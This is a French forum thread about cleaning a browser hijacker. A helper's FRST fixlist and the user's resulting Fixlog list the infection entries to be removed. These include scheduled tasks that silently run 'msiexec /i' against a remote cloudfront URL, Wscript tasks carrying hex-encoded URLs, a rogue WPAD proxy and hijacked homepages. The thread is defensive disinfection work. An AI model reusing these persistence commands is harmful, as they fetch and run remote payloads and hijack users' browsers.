Infection Navigateur WEB

Aide à la désinfection pour supprimer les virus, adwares, ransomwares, trojans.

Modérateurs : Mods Windows, Helper

meelkus
Messages : 2
Inscription : 03 mai 2017 22:42

Infection Navigateur WEB

Message par meelkus » 03 mai 2017 22:54

Bonjour à tous,

Tout d'abord merci de votre précieuse aide, en attendant de votre réponse je vous transmets ci-dessous les liens demandés (FRST - ADDITION - SHORTCUT)

FRST : http://pjjoint.malekal.com/files.php?id ... 9o88p14r10

ADDITION : http://pjjoint.malekal.com/files.php?id ... 14s10q10l7

SHORTCUT : http://pjjoint.malekal.com/files.php?id ... 56l11o6b10

Avatar de l’utilisateur
angelique
Geek à longue barbe
Geek à longue barbe
Messages : 27153
Inscription : 28 févr. 2008 14:58
Localisation : Breizhilienne à l' 0u3st
Contact :

Re: Suppression de Trojan avec FRST

Message par angelique » 04 mai 2017 10:47

bonjour,

SpyHunter et Spyware Doctor sont proposés via de faux blogs de sécurité... Ces faux blogs sont créés par des sociétés affiliées qui multiplient les sites WEB et tentent d'être dans les premiers résultats de Google concernant une des infections présentes sur ton PC.
Ces faux blogs proposent des versions payantes pour soit disant désinfecter son PC, ces sociétés affiliés touchent un % sur la ventes

Ce sont des pratiques douteuses et très limites, et non des méthodes dignes d'antispywares sérieux.
Je te conseille donc de désinstaller SpyHunter et/ou Spyware Doctor présent sur ton PC.

Pour plus d'informations, voir : viewtopic.php?f=56&t=12847



Le rapport frst.txt est incomplet, tu referas donc après la procédure ci dessous de nouveau des rapports frst.txt et addition.txt

  • Ouvre le bloc-notes : Menu Démarrer / Tous les programmes / Accessoires et Bloc-Notes. (ou executer➫notepad)
    Copie/colle dedans ce qui suit :

    Code : Tout sélectionner

    HKU\S-1-5-21-2231331243-3827533549-682609126-1002\...\ChromeHTML: -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.) <==== ATTENTION
    Task: {0D15C65D-65E3-49F7-8835-16096E942ABE} - System32\Tasks\Clonerge Community => C:\Program Files (x86)\Drization\xbuky.exe [2017-04-13] (Google Inc.)
    Task: {191A3896-DDC9-401B-B402-04F407776F91} - System32\Tasks\AutoPico Daily Restart => C:\Users\Melkus\AppData\Local\Temp\RarSFX0\AutoPico.exe  <==== ATTENTION
    Task: {3E3D9762-225D-4899-8A1F-F94FF825DBBD} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
    Task: {4F9589EC-AA06-4358-9664-AB447F1F2C87} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-03] () <==== ATTENTION
    Task: {6B97B6A2-9538-4164-B71A-06FE91D0ABE6} - System32\Tasks\Yahoo! Powered tared => Wscript.exe "C:\ProgramData\{3D62F801-B720-72C7-31E6-EC85ABA4674B}\fafo.txt" "687474703a2f2f7761676e672e636f6d" "433a5c50726f6772616d446174615c7b33443632463830312d423732302d373243372d333145362d4543383541424134363734427d5c73656c657369" "433a5c50726f6772616d446174615c7b33443632463830312d423732302d373243372d333145 (l'élément de données a 78 caractères en plus).
    Task: {742E1317-BA59-41F6-92C0-E5C112B6930C} - System32\Tasks\Grewgh => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=ST1000LM024XHN-M101MBB_S32XJ9BF403432&amp;d=20170413 /q <==== ATTENTION
    Task: {7CE71D51-2EC0-4692-881E-E70077F5BBB8} - System32\Tasks\rPkPf9RkNM => C:\Program Files (x86)\4mzczf76zp\updengine.exe [2017-03-14] () <==== ATTENTION
    Task: {7D47881D-182C-4A15-BBB1-076EA1BA353C} - System32\Tasks\{16FEDEAC-6E5E-9382-67C8-52C477717602} => C:\Users\Melkus\AppData\Roaming\bodor\PRODUC~1.EXE [2013-04-23] ()
    Task: {99827DB0-90FE-411B-BB94-3C9BE029A179} - System32\Tasks\Samsung Update => msiexec.exe /i hxxp://D2Buh1bF1G584W.CLouDfRoNT.net/mmtsk/occup.php?p=ST1000LM024XHN-M101MBB_S32XJ9BF403432&amp;d=20170413 /q <==== ATTENTION
    Task: {F0B5621B-B905-4AE3-B078-02972E781D46} - System32\Tasks\Bing Search Engine tared => Wscript.exe "C:\ProgramData\{DACA1FA9-5088-956F-D64E-0B2D4C0C80E3}\fafo.txt" "68747470733a2f2f77617662736c792e636f6d" "433a5c50726f6772616d446174615c7b44414341314641392d353038382d393536462d443634452d3042324434433043383045337d5c73656c657369" "433a5c50726f6772616d446174615c7b44414341314641392d353038382d393536462d (l'élément de données a 84 caractères en plus).
    Task: {F4A0A86F-2438-48B9-BF25-16BC8DB74F24} - \WPD\SqmUpload_S-1-5-21-2231331243-3827533549-682609126-1002 -> Pas de fichier <==== ATTENTION
    Task: C:\WINDOWS\Tasks\Bing Search Engine tared.job => Wscript.exe  C:\ProgramData\{DACA1FA9-5088-956F-D64E-0B2D4C0C80E3}\fafo.txt <==== ATTENTION
    Task: C:\WINDOWS\Tasks\Yahoo! Powered tared.job => Wscript.exe  C:\ProgramData\{3D62F801-B720-72C7-31E6-EC85ABA4674B}\fafo.txt <==== ATTENTION
    Task: C:\WINDOWS\Tasks\{16FEDEAC-6E5E-9382-67C8-52C477717602}.job => 
    Task: C:\WINDOWS\Tasks\{1C53A59E-A7FF-BB95-534E-0C55B57C0651}.job => 
    Shortcut: C:\Users\Melkus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\Melkus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\Melkus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
    Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
    ShortcutWithArgument: C:\Users\Melkus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493296358&z=c995136131f360786bcd401g6z0tdc5odt2qbcbwfb&from=che0812&uid=ST1000LM024XHN-M101MBB_S32XJ9BF403432
    ShortcutWithArgument: C:\Users\Melkus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493296358&z=c995136131f360786bcd401g6z0tdc5odt2qbcbwfb&from=che0812&uid=ST1000LM024XHN-M101MBB_S32XJ9BF403432
    HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [303928 2017-03-22] (Apple Inc.)
    HKLM-x32\...\Run: [WSHelperSetup.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
    HKLM-x32\...\RunOnce: [Roculugona] => C:\WINDOWS\SysWOW64\wscript.exe /E:vbscript /B "C:\Users\Melkus\AppData\Roaming\Fafeda"
    HKLM-x32\...\RunOnce: [Dobahafodo] => C:\WINDOWS\SysWoW64\wscript.exe /E:vbscript /B "C:\Users\Melkus\AppData\Roaming\Lomaba"
    HKU\S-1-5-21-2231331243-3827533549-682609126-1002\...\Run: [Interstatnogui] => C:\Users\Melkus\AppData\Roaming\Interstatnogui\interstatnogui.exe [3001176 2017-04-13] (IT Genius) <===== ATTENTION
    HKU\S-1-5-21-2231331243-3827533549-682609126-1002\...\Run: [GoogleChromeAutoLaunch_F6D48095A694DE35312CD25CBE45C65F] => "C:\Program Files (x86)\Alltie\Application\chrome.exe" --no-startup-window /prefetch:5
    HKU\S-1-5-21-2231331243-3827533549-682609126-1002\...\Run: [GoogleChromeAutoLaunch_99602D254C211209F9326B181941B3F0] => C:\Program Files (x86)\Everness\Application\chrome.exe [941912 2017-03-09] (Google Inc.)
    HKLM\...\Providers\sw210cvn: C:\Program Files (x86)\Clonerge Community\local64spl.dll [310784 2017-04-13] ()
    ShellExecuteHooks: Pas de nom - {DE61C5D0-1E9D-11E7-83B9-64006A5CFC23} -  -> Pas de fichier
    AutoConfigURL: [S-1-5-21-2231331243-3827533549-682609126-1002] => hxxp://access-webs.net/wpad.dat?48e12a9d9584581f97f13316b459db7f28393579
    ManualProxies: 0hxxp://access-webs.net/wpad.dat?48e12a9d9584581f97f13316b459db7f28393579
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493296358&z=c995136131f360786bcd401g6z0tdc5odt2qbcbwfb&from=che0812&uid=ST1000LM024XHN-M101MBB_S32XJ9BF403432
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493296358&z=c995136131f360786bcd401g6z0tdc5odt2qbcbwfb&from=che0812&uid=ST1000LM024XHN-M101MBB_S32XJ9BF403432
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493296358&z=c995136131f360786bcd401g6z0tdc5odt2qbcbwfb&from=che0812&uid=ST1000LM024XHN-M101MBB_S32XJ9BF403432&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493296358&z=c995136131f360786bcd401g6z0tdc5odt2qbcbwfb&from=che0812&uid=ST1000LM024XHN-M101MBB_S32XJ9BF403432&q={searchTerms}
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493296358&z=c995136131f360786bcd401g6z0tdc5odt2qbcbwfb&from=che0812&uid=ST1000LM024XHN-M101MBB_S32XJ9BF403432
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493296358&z=c995136131f360786bcd401g6z0tdc5odt2qbcbwfb&from=che0812&uid=ST1000LM024XHN-M101MBB_S32XJ9BF403432
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493296358&z=c995136131f360786bcd401g6z0tdc5odt2qbcbwfb&from=che0812&uid=ST1000LM024XHN-M101MBB_S32XJ9BF403432&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493296358&z=c995136131f360786bcd401g6z0tdc5odt2qbcbwfb&from=che0812&uid=ST1000LM024XHN-M101MBB_S32XJ9BF403432&q={searchTerms}
    HKU\S-1-5-21-2231331243-3827533549-682609126-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493296358&z=c995136131f360786bcd401g6z0tdc5odt2qbcbwfb&from=che0812&uid=ST1000LM024XHN-M101MBB_S32XJ9BF403432
    HKU\S-1-5-21-2231331243-3827533549-682609126-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493296358&z=c995136131f360786bcd401g6z0tdc5odt2qbcbwfb&from=che0812&uid=ST1000LM024XHN-M101MBB_S32XJ9BF403432
    SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493296358&z=c995136131f360786bcd401g6z0tdc5odt2qbcbwfb&from=che0812&uid=ST1000LM024XHN-M101MBB_S32XJ9BF403432&q={searchTerms}
    SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493296358&z=c995136131f360786bcd401g6z0tdc5odt2qbcbwfb&from=che0812&uid=ST1000LM024XHN-M101MBB_S32XJ9BF403432&q={searchTerms}
    SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493296358&z=c995136131f360786bcd401g6z0tdc5odt2qbcbwfb&from=che0812&uid=ST1000LM024XHN-M101MBB_S32XJ9BF403432&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-2231331243-3827533549-682609126-1002 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493296358&z=c995136131f360786bcd401g6z0tdc5odt2qbcbwfb&from=che0812&uid=ST1000LM024XHN-M101MBB_S32XJ9BF403432&q={searchTerms}
    Toolbar: HKU\S-1-5-21-2231331243-3827533549-682609126-1002 -> Pas de nom - {A13C2648-91D4-4BF3-BC6D-0079707C4389} -  Pas de fichier
    FF NewTab: Mozilla\Firefox\Profiles\ac2wd67b.default -> hxxp://www.initialpage123.com/?z=cabb2b215240f611abc6b18g9z5t3o9e0b5e5t6gec&from=wak&uid=ST1000LM024XHN-M101MBB_S32XJ9BF403432&type=hp
    FF DefaultSearchEngine: Mozilla\Firefox\Profiles\ac2wd67b.default -> initialpage123
    FF SelectedSearchEngine: Mozilla\Firefox\Profiles\ac2wd67b.default -> initialpage123
    FF Homepage: Mozilla\Firefox\Profiles\ac2wd67b.default -> hxxp://www.initialpage123.com/?z=cabb2b215240f611abc6b18g9z5t3o9e0b5e5t6gec&from=wak&uid=ST1000LM024XHN-M101MBB_S32XJ9BF403432&type=hp
    FF NewTab: Firefox\Firefox\Profiles\ac2wd67b.default -> hxxp://www.initialpage123.com/?z=cabb2b215240f611abc6b18g9z5t3o9e0b5e5t6gec&from=wak&uid=ST1000LM024XHN-M101MBB_S32XJ9BF403432&type=hp
    FF DefaultSearchEngine: Firefox\Firefox\Profiles\ac2wd67b.default -> initialpage123
    FF SelectedSearchEngine: Firefox\Firefox\Profiles\ac2wd67b.default -> initialpage123
    CHR Extension: (WinM9) - C:\Users\Melkus\AppData\Local\Google\Chrome\User Data\Default\Extensions\ppkecenfjeboginhnagdgbhnkgckeiod [2017-04-21]
    StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.ourluckysites.com/?type=sc&ts=1493296358&z=c995136131f360786bcd401g6z0tdc5odt2qbcbwfb&from=che0812&uid=ST1000LM024XHN-M101MBB_S32XJ9BF403432
    HKU\S-1-5-21-2231331243-3827533549-682609126-1002\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.) <==== ATTENTION
    S2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [116400 2017-04-13] () <==== ATTENTION
    R2 Kitty; C:\Users\Melkus\AppData\Local\Kitty\Kitty.dll [123904 2017-05-03] (word) [Fichier non signé] <==== ATTENTION
    R2 OtherSearch; C:\Program Files (x86)\4mzczf76zp\kl.dll [1009152 2017-03-13] () [Fichier non signé] <==== ATTENTION
    R2 SNARE; C:\Users\Melkus\AppData\Local\SNARE\Snare.dll [826368 2017-05-02] (InterSect Alliance Pty Ltd) [Fichier non signé]
    R2 SNAREA; C:\Users\Melkus\AppData\Local\SNAREA\Snare.dll [826368 2017-05-03] (InterSect Alliance Pty Ltd) [Fichier non signé]
    R2 WinSAPSvc; C:\Users\Melkus\AppData\Roaming\WinSAPSvc\WinSAP.dll [217600 2017-05-03] (WinSAP.dll) [Fichier non signé] <==== ATTENTION
    S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== ATTENTION
    C:\Program Files (x86)\Everness
    C:\Program Files (x86)\Firefox
    C:\Users\Melkus\AppData\Local\Kitty
    C:\Program Files (x86)\4mzczf76zp
    C:\Users\Melkus\AppData\Local\SNARE
    C:\Users\Melkus\AppData\Local\SNAREA
    C:\Users\Melkus\AppData\Roaming\WinSAPSvc
    C:\Program Files (x86)\Elex-tech
    C:\Program Files (x86)\Clonerge Community
    C:\Users\Melkus\AppData\Roaming\Fafeda
    C:\Users\Melkus\AppData\Roaming\Lomaba
    C:\Users\Melkus\AppData\Roaming\Interstatnogui
    C:\Program Files (x86)\Alltie
    C:\ProgramData\{3D62F801-B720-72C7-31E6-EC85ABA4674B}
    C:\Program Files (x86)\MIO
    Hosts:
    RemoveProxy:
    EmptyTemp:
    
    
  • Menu Fichier / Enregistrer-sous
    Place toi sur le bureau.
    Dans le champs en bas, nom du fichier mets : fixlist.txt
    Clic sur Enregistrer - cela va créer un fichier fixlist.txt sur le bureau.
  • Ferme toutes les applications, y compris ton navigateur
  • Double-clique sur FRST.exe
    Image Sous Vista, Windows 7, 8,10, etc.... il faut lancer le fichier par clic-droit ➫ Exécuter en tant qu'administrateur
    Sur le menu principal, clique une seule fois sur Corriger/Fix et patiente le temps de la correction


    Un redémarrage peut être nécessaire (pas obligatoire).
  • L'outil va créer un rapport de correction Fixlog.txt. Poste ce rapport dans ta réponse avec ton commentaire si c'est mieux !
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
http://angelik.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Ne soyez pas Rat!
Image
---------------------------------------------------------------------------------------------------------------------
ZIK.:: R00tsL3gacy Reggae141.com
ZIK.:: LaGr0sseRadi0

meelkus
Messages : 2
Inscription : 03 mai 2017 22:42

Re: Infection Navigateur WEB

Message par meelkus » 06 mai 2017 15:04

Bonjour,

Alors voici le rapport de correction Fixlog.txt :

Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 03-05-2017 01
Exécuté par Melkus (04-05-2017 12:38:25) Run:1
Exécuté depuis C:\Users\Melkus\Desktop
Profils chargés: Melkus (Profils disponibles: Melkus)
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
HKU\S-1-5-21-2231331243-3827533549-682609126-1002\...\ChromeHTML: -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.) <==== ATTENTION
Task: {0D15C65D-65E3-49F7-8835-16096E942ABE} - System32\Tasks\Clonerge Community => C:\Program Files (x86)\Drization\xbuky.exe [2017-04-13] (Google Inc.)
Task: {191A3896-DDC9-401B-B402-04F407776F91} - System32\Tasks\AutoPico Daily Restart => C:\Users\Melkus\AppData\Local\Temp\RarSFX0\AutoPico.exe <==== ATTENTION
Task: {3E3D9762-225D-4899-8A1F-F94FF825DBBD} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
Task: {4F9589EC-AA06-4358-9664-AB447F1F2C87} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-03] () <==== ATTENTION
Task: {6B97B6A2-9538-4164-B71A-06FE91D0ABE6} - System32\Tasks\Yahoo! Powered tared => Wscript.exe "C:\ProgramData\{3D62F801-B720-72C7-31E6-EC85ABA4674B}\fafo.txt" "687474703a2f2f7761676e672e636f6d" "433a5c50726f6772616d446174615c7b33443632463830312d423732302d373243372d333145362d4543383541424134363734427d5c73656c657369" "433a5c50726f6772616d446174615c7b33443632463830312d423732302d373243372d333145 (l'�l�ment de donn�es a 78 caract�res en plus).
Task: {742E1317-BA59-41F6-92C0-E5C112B6930C} - System32\Tasks\Grewgh => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=ST1000LM024XHN-M101MBB_S32XJ9BF403432&amp;d=20170413 /q <==== ATTENTION
Task: {7CE71D51-2EC0-4692-881E-E70077F5BBB8} - System32\Tasks\rPkPf9RkNM => C:\Program Files (x86)\4mzczf76zp\updengine.exe [2017-03-14] () <==== ATTENTION
Task: {7D47881D-182C-4A15-BBB1-076EA1BA353C} - System32\Tasks\{16FEDEAC-6E5E-9382-67C8-52C477717602} => C:\Users\Melkus\AppData\Roaming\bodor\PRODUC~1.EXE [2013-04-23] ()
Task: {99827DB0-90FE-411B-BB94-3C9BE029A179} - System32\Tasks\Samsung Update => msiexec.exe /i hxxp://D2Buh1bF1G584W.CLouDfRoNT.net/mmtsk/occup.php?p=ST1000LM024XHN-M101MBB_S32XJ9BF403432&amp;d=20170413 /q <==== ATTENTION
Task: {F0B5621B-B905-4AE3-B078-02972E781D46} - System32\Tasks\Bing Search Engine tared => Wscript.exe "C:\ProgramData\{DACA1FA9-5088-956F-D64E-0B2D4C0C80E3}\fafo.txt" "68747470733a2f2f77617662736c792e636f6d" "433a5c50726f6772616d446174615c7b44414341314641392d353038382d393536462d443634452d3042324434433043383045337d5c73656c657369" "433a5c50726f6772616d446174615c7b44414341314641392d353038382d393536462d (l'�l�ment de donn�es a 84 caract�res en plus).
Task: {F4A0A86F-2438-48B9-BF25-16BC8DB74F24} - \WPD\SqmUpload_S-1-5-21-2231331243-3827533549-682609126-1002 -> Pas de fichier <==== ATTENTION
Task: C:\WINDOWS\Tasks\Bing Search Engine tared.job => Wscript.exe C:\ProgramData\{DACA1FA9-5088-956F-D64E-0B2D4C0C80E3}\fafo.txt <==== ATTENTION
Task: C:\WINDOWS\Tasks\Yahoo! Powered tared.job => Wscript.exe C:\ProgramData\{3D62F801-B720-72C7-31E6-EC85ABA4674B}\fafo.txt <==== ATTENTION
Task: C:\WINDOWS\Tasks\{16FEDEAC-6E5E-9382-67C8-52C477717602}.job =>
Task: C:\WINDOWS\Tasks\{1C53A59E-A7FF-BB95-534E-0C55B57C0651}.job =>
Shortcut: C:\Users\Melkus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Melkus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Melkus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
ShortcutWithArgument: C:\Users\Melkus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=14932 ... J9BF403432
ShortcutWithArgument: C:\Users\Melkus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=14932 ... J9BF403432
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [303928 2017-03-22] (Apple Inc.)
HKLM-x32\...\Run: [WSHelperSetup.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
HKLM-x32\...\RunOnce: [Roculugona] => C:\WINDOWS\SysWOW64\wscript.exe /E:vbscript /B "C:\Users\Melkus\AppData\Roaming\Fafeda"
HKLM-x32\...\RunOnce: [Dobahafodo] => C:\WINDOWS\SysWoW64\wscript.exe /E:vbscript /B "C:\Users\Melkus\AppData\Roaming\Lomaba"
HKU\S-1-5-21-2231331243-3827533549-682609126-1002\...\Run: [Interstatnogui] => C:\Users\Melkus\AppData\Roaming\Interstatnogui\interstatnogui.exe [3001176 2017-04-13] (IT Genius) <===== ATTENTION
HKU\S-1-5-21-2231331243-3827533549-682609126-1002\...\Run: [GoogleChromeAutoLaunch_F6D48095A694DE35312CD25CBE45C65F] => "C:\Program Files (x86)\Alltie\Application\chrome.exe" --no-startup-window /prefetch:5
HKU\S-1-5-21-2231331243-3827533549-682609126-1002\...\Run: [GoogleChromeAutoLaunch_99602D254C211209F9326B181941B3F0] => C:\Program Files (x86)\Everness\Application\chrome.exe [941912 2017-03-09] (Google Inc.)
HKLM\...\Providers\sw210cvn: C:\Program Files (x86)\Clonerge Community\local64spl.dll [310784 2017-04-13] ()
ShellExecuteHooks: Pas de nom - {DE61C5D0-1E9D-11E7-83B9-64006A5CFC23} - -> Pas de fichier
AutoConfigURL: [S-1-5-21-2231331243-3827533549-682609126-1002] => hxxp://access-webs.net/wpad.dat?48e12a9d9584581f97f13316b459db7f28393579
ManualProxies: 0hxxp://access-webs.net/wpad.dat?48e12a9d9584581f97f13316b459db7f28393579
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=14932 ... J9BF403432
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=14932 ... J9BF403432
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&t ... earchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&t ... earchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=14932 ... J9BF403432
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=14932 ... J9BF403432
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&t ... earchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&t ... earchTerms}
HKU\S-1-5-21-2231331243-3827533549-682609126-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=14932 ... J9BF403432
HKU\S-1-5-21-2231331243-3827533549-682609126-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=14932 ... J9BF403432
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&t ... earchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&t ... earchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&t ... earchTerms}
SearchScopes: HKU\S-1-5-21-2231331243-3827533549-682609126-1002 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&t ... earchTerms}
Toolbar: HKU\S-1-5-21-2231331243-3827533549-682609126-1002 -> Pas de nom - {A13C2648-91D4-4BF3-BC6D-0079707C4389} - Pas de fichier
FF NewTab: Mozilla\Firefox\Profiles\ac2wd67b.default -> hxxp://www.initialpage123.com/?z=cabb2b215240f ... 32&type=hp
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\ac2wd67b.default -> initialpage123
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\ac2wd67b.default -> initialpage123
FF Homepage: Mozilla\Firefox\Profiles\ac2wd67b.default -> hxxp://www.initialpage123.com/?z=cabb2b215240f ... 32&type=hp
FF NewTab: Firefox\Firefox\Profiles\ac2wd67b.default -> hxxp://www.initialpage123.com/?z=cabb2b215240f ... 32&type=hp
FF DefaultSearchEngine: Firefox\Firefox\Profiles\ac2wd67b.default -> initialpage123
FF SelectedSearchEngine: Firefox\Firefox\Profiles\ac2wd67b.default -> initialpage123
CHR Extension: (WinM9) - C:\Users\Melkus\AppData\Local\Google\Chrome\User Data\Default\Extensions\ppkecenfjeboginhnagdgbhnkgckeiod [2017-04-21]
StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.ourluckysites.com/?type=sc&ts=14932 ... J9BF403432
HKU\S-1-5-21-2231331243-3827533549-682609126-1002\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.) <==== ATTENTION
S2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [116400 2017-04-13] () <==== ATTENTION
R2 Kitty; C:\Users\Melkus\AppData\Local\Kitty\Kitty.dll [123904 2017-05-03] (word) [Fichier non sign�] <==== ATTENTION
R2 OtherSearch; C:\Program Files (x86)\4mzczf76zp\kl.dll [1009152 2017-03-13] () [Fichier non sign�] <==== ATTENTION
R2 SNARE; C:\Users\Melkus\AppData\Local\SNARE\Snare.dll [826368 2017-05-02] (InterSect Alliance Pty Ltd) [Fichier non sign�]
R2 SNAREA; C:\Users\Melkus\AppData\Local\SNAREA\Snare.dll [826368 2017-05-03] (InterSect Alliance Pty Ltd) [Fichier non sign�]
R2 WinSAPSvc; C:\Users\Melkus\AppData\Roaming\WinSAPSvc\WinSAP.dll [217600 2017-05-03] (WinSAP.dll) [Fichier non sign�] <==== ATTENTION
S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== ATTENTION
C:\Program Files (x86)\Everness
C:\Program Files (x86)\Firefox
